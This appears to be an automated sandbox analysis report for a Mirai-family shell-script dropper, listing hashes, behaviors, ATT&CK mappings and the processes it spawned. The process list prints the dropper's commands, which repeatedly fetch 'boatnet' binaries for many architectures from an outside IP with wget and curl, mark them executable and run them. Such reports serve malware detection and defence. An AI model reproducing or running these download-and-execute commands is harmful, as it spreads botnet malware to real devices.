Analysis
-
max time kernel
150s -
max time network
145s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
23-01-2025 04:22
Static task
static1
Behavioral task
behavioral1
Sample
f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh
-
Size
2KB
-
MD5
a04231d2572fe53296e84de33494e755
-
SHA1
858cf66fac781dde0b6be798bec7976b36d91826
-
SHA256
f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff
-
SHA512
3f3405f3c6a3977d5445fa9595aeaba7e8531882a3d681a28e4ddb13777241765e7ffdbc329e2587ba70c97017fd65eae2376e5ce6ea54a4404d4ac92e0ccb96
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 771 chmod 803 chmod 817 chmod 677 chmod 721 chmod 745 chmod 759 chmod 784 chmod 797 chmod 830 chmod 697 chmod 703 chmod 734 chmod 689 chmod 710 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 678 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh /tmp/WTF 690 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh /tmp/WTF 698 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh /tmp/WTF 704 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh /tmp/WTF 712 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh /tmp/WTF 722 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh /tmp/WTF 735 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh /tmp/WTF 747 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh /tmp/WTF 761 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh /tmp/WTF 773 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh /tmp/WTF 786 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh /tmp/WTF 798 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh /tmp/WTF 807 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh /tmp/WTF 819 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh /tmp/WTF 831 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh -
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 4 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral2/files/fstream-1.dat upx behavioral2/files/fstream-4.dat upx -
Checks CPU configuration 1 TTPs 15 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/463/cmdline WTF File opened for reading /proc/787/cmdline WTF File opened for reading /proc/810/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/789/cmdline WTF File opened for reading /proc/748/cmdline WTF File opened for reading /proc/864/cmdline WTF File opened for reading /proc/406/cmdline WTF File opened for reading /proc/779/cmdline WTF File opened for reading /proc/650/cmdline WTF File opened for reading /proc/821/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/exe WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/644/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/651/cmdline WTF File opened for reading /proc/692/cmdline WTF File opened for reading /proc/self/exe WTF File opened for reading /proc/810/cmdline WTF File opened for reading /proc/860/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/776/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/854/cmdline WTF File opened for reading /proc/864/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/768/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/870/cmdline WTF File opened for reading /proc/870/cmdline WTF File opened for reading /proc/649/cmdline WTF File opened for reading /proc/860/cmdline WTF File opened for reading /proc/868/cmdline WTF File opened for reading /proc/858/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/792/cmdline WTF File opened for reading /proc/750/cmdline WTF File opened for reading /proc/856/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/608/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/656/cmdline WTF File opened for reading /proc/464/cmdline WTF File opened for reading /proc/692/cmdline WTF File opened for reading /proc/850/cmdline WTF File opened for reading /proc/827/cmdline WTF File opened for reading /proc/862/cmdline WTF File opened for reading /proc/self/auxv curl File opened for reading /proc/768/cmdline WTF File opened for reading /proc/792/cmdline WTF File opened for reading /proc/802/cmdline WTF File opened for reading /proc/419/cmdline WTF File opened for reading /proc/730/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/809/cmdline WTF File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 681 wget 684 curl 687 cat -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.i686 curl File opened for modification /tmp/boatnet.mpsl wget File opened for modification /tmp/boatnet.arm curl File opened for modification /tmp/boatnet.arm6 curl File opened for modification /tmp/boatnet.arm7 curl File opened for modification /tmp/boatnet.x86_64 curl File opened for modification /tmp/boatnet.arm5 wget File opened for modification /tmp/boatnet.arm6 wget File opened for modification /tmp/boatnet.ppc curl File opened for modification /tmp/boatnet.spc wget File opened for modification /tmp/boatnet.ppc wget File opened for modification /tmp/boatnet.m68k wget File opened for modification /tmp/boatnet.sh4 curl File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/WTF f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh File opened for modification /tmp/boatnet.i468 curl File opened for modification /tmp/boatnet.arm5 curl File opened for modification /tmp/boatnet.arm7 wget File opened for modification /tmp/boatnet.sh4 wget File opened for modification /tmp/boatnet.mpsl curl File opened for modification /tmp/boatnet.arm wget File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.mips curl File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.arc curl File opened for modification /tmp/boatnet.spc curl File opened for modification /tmp/boatnet.m68k curl
Processes
-
/tmp/f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh/tmp/f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:652 -
/usr/bin/wgetwget http://193.200.78.24/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:657
-
-
/usr/bin/curlcurl -O http://193.200.78.24/hiddenbin/boatnet.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:665
-
-
/bin/catcat boatnet.x862⤵PID:675
-
-
/bin/chmodchmod +x boatnet.x86 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-uypvK8 WTF2⤵
- File and Directory Permissions Modification
PID:677
-
-
/tmp/WTF./WTF2⤵PID:678
-
-
/usr/bin/wgetwget http://193.200.78.24/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:681
-
-
/usr/bin/curlcurl -O http://193.200.78.24/hiddenbin/boatnet.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:684
-
-
/bin/catcat boatnet.mips2⤵
- System Network Configuration Discovery
PID:687
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-uypvK8 WTF2⤵
- File and Directory Permissions Modification
PID:689
-
-
/tmp/WTF./WTF2⤵PID:690
-
-
/usr/bin/wgetwget http://193.200.78.24/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:693
-
-
/usr/bin/curlcurl -O http://193.200.78.24/hiddenbin/boatnet.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:695
-
-
/bin/catcat boatnet.arc2⤵PID:696
-
-
/bin/chmodchmod +x boatnet.arc boatnet.mips boatnet.x86 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-uypvK8 WTF2⤵
- File and Directory Permissions Modification
PID:697
-
-
/tmp/WTF./WTF2⤵PID:698
-
-
/usr/bin/wgetwget http://193.200.78.24/hiddenbin/boatnet.i4682⤵PID:700
-
-
/usr/bin/curlcurl -O http://193.200.78.24/hiddenbin/boatnet.i4682⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:701
-
-
/bin/catcat boatnet.i4682⤵PID:702
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-uypvK8 WTF2⤵
- File and Directory Permissions Modification
PID:703
-
-
/tmp/WTF./WTF2⤵PID:704
-
-
/usr/bin/wgetwget http://193.200.78.24/hiddenbin/boatnet.i6862⤵PID:705
-
-
/usr/bin/curlcurl -O http://193.200.78.24/hiddenbin/boatnet.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:706
-
-
/bin/catcat boatnet.i6862⤵PID:709
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-uypvK8 WTF2⤵
- File and Directory Permissions Modification
PID:710
-
-
/tmp/WTF./WTF2⤵PID:712
-
-
/usr/bin/wgetwget http://193.200.78.24/hiddenbin/boatnet.x86_642⤵PID:713
-
-
/usr/bin/curlcurl -O http://193.200.78.24/hiddenbin/boatnet.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:716
-
-
/bin/catcat boatnet.x86_642⤵PID:719
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-uypvK8 WTF2⤵
- File and Directory Permissions Modification
PID:721
-
-
/tmp/WTF./WTF2⤵PID:722
-
-
/usr/bin/wgetwget http://193.200.78.24/hiddenbin/boatnet.mpsl2⤵
- Writes file to tmp directory
PID:723
-
-
/usr/bin/curlcurl -O http://193.200.78.24/hiddenbin/boatnet.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:726
-
-
/bin/catcat boatnet.mpsl2⤵PID:732
-
-
/bin/chmodchmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-uypvK8 WTF2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/WTF./WTF2⤵PID:735
-
-
/usr/bin/wgetwget http://193.200.78.24/hiddenbin/boatnet.arm2⤵
- Writes file to tmp directory
PID:737
-
-
/usr/bin/curlcurl -O http://193.200.78.24/hiddenbin/boatnet.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/catcat boatnet.arm2⤵PID:744
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-uypvK8 WTF2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/WTF./WTF2⤵
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:747
-
-
/usr/bin/wgetwget http://193.200.78.24/hiddenbin/boatnet.arm52⤵
- Writes file to tmp directory
PID:751
-
-
/usr/bin/curlcurl -O http://193.200.78.24/hiddenbin/boatnet.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/catcat boatnet.arm52⤵PID:758
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-uypvK8 WTF2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/WTF./WTF2⤵PID:761
-
-
/usr/bin/wgetwget http://193.200.78.24/hiddenbin/boatnet.arm62⤵
- Writes file to tmp directory
PID:762
-
-
/usr/bin/curlcurl -O http://193.200.78.24/hiddenbin/boatnet.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/catcat boatnet.arm62⤵PID:770
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-uypvK8 WTF2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/WTF./WTF2⤵
- Reads runtime system information
PID:773
-
-
/usr/bin/wgetwget http://193.200.78.24/hiddenbin/boatnet.arm72⤵
- Writes file to tmp directory
PID:774
-
-
/usr/bin/curlcurl -O http://193.200.78.24/hiddenbin/boatnet.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/catcat boatnet.arm72⤵PID:783
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-uypvK8 WTF2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/WTF./WTF2⤵
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:786
-
-
/usr/bin/wgetwget http://193.200.78.24/hiddenbin/boatnet.ppc2⤵
- Writes file to tmp directory
PID:790
-
-
/usr/bin/curlcurl -O http://193.200.78.24/hiddenbin/boatnet.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/catcat boatnet.ppc2⤵PID:796
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-uypvK8 WTF2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/WTF./WTF2⤵PID:798
-
-
/usr/bin/wgetwget http://193.200.78.24/hiddenbin/boatnet.spc2⤵
- Writes file to tmp directory
PID:800
-
-
/usr/bin/curlcurl -O http://193.200.78.24/hiddenbin/boatnet.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/catcat boatnet.spc2⤵PID:802
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-uypvK8 WTF2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/WTF./WTF2⤵PID:807
-
-
/usr/bin/wgetwget http://193.200.78.24/hiddenbin/boatnet.m68k2⤵
- Writes file to tmp directory
PID:809
-
-
/usr/bin/curlcurl -O http://193.200.78.24/hiddenbin/boatnet.m68k2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:810
-
-
/bin/catcat boatnet.m68k2⤵PID:813
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh WTF2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/WTF./WTF2⤵PID:819
-
-
/usr/bin/wgetwget http://193.200.78.24/hiddenbin/boatnet.sh42⤵
- Writes file to tmp directory
PID:821
-
-
/usr/bin/curlcurl -O http://193.200.78.24/hiddenbin/boatnet.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/catcat boatnet.sh42⤵PID:828
-
-
/bin/chmodchmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 f15049236ee277bc23f3374ffb5d52a3061573cda7e98892d685e06450d38aff.sh WTF2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/WTF./WTF2⤵PID:831
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD5419af9271063995aa7d8e36f7b9431cc
SHA1048cefabc4702f4f301aba13a453592f862dac99
SHA2567361c9bd5f6688bc9de5c6bd9ca7164edb537ccb08aa9c7522a620d4f410fba1
SHA512eae11b558875bcd46845788e7b0a84ce9c97b80aa4909e34412bb9b9db449bd418421f14db3436adc53483737d21fe69b27a57f2098b24e27d0803d5fe01aa52
-
Filesize
105KB
MD5b209d553a02a0ad088f5b52e2bdda33d
SHA168260c4d8152a82a2df6dfd092969c81a4123431
SHA256704c974b3616dd65eb799023471d933811e2cb7d8704e5e8eadba78d9c92b70f
SHA51237814c4053a35e49907860f061ebbb715391e7f4a00d46ea96591673e94be73d4b032245b2289f60871f1ff870bce293cf12fbc8e7f806179fd068d57b5d6f50
-
Filesize
220B
MD5f1c24d9fa40a047ae22d2d3ae7dfeac9
SHA1750274b02d5f5b00026a4f55b020f4285c693533
SHA256219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc
SHA51236bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259
-
Filesize
220B
MD5a8f502a6fb3b7b940e922c951d9e493a
SHA1fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf
SHA256748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec
SHA512e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338
-
Filesize
57KB
MD5813a453dcd16f3dabca9d11459e89328
SHA15180409485d6704faee3ab3378b71c1fc1512ac9
SHA256e5af9a223519bafc9f55798d33802a0fe33ada434e7055ad616d50d24e9ddcba
SHA512db98c29a1aa5ffc80bc398a3844521276abb9e52bd66675fdbc0e607e7a7539f5a01a0a458ad48285b82d5270db3a392e6950bf357766de2a110778bb7579b37
-
Filesize
20KB
MD5911aa101a1f5c919712ab954d0dfaa3f
SHA16778ae6880057cbcebe3a593ee3115ae7eae2847
SHA25630d62335e710f94be1996bf37c15f8c410e493c1c9d10cc7420f736778dc3c41
SHA512981aee28346bcf9af048979ddf305a2483fe2e93d6b3f8dd07fa5793aea9c5b9a8e300b2c6368a5b5c6b7b2205cca4f5b9ea7ab22e191f0854e7bd7e093e9c33